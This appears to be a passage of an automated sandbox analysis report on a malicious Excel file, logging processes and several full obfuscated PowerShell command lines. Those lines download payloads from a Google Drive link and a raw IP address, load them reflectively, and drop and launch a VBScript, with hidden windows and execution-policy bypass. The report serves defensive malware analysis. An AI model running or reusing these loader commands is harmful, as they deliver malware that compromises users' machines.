          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899F022D push eax; iretd 5_2_000007FE899F0241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899F00BD pushad ; iretd 5_2_000007FE899F00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899F524B push eax; ret 5_2_000007FE899F527A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899F529B push esp; ret 5_2_000007FE899F52AA

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
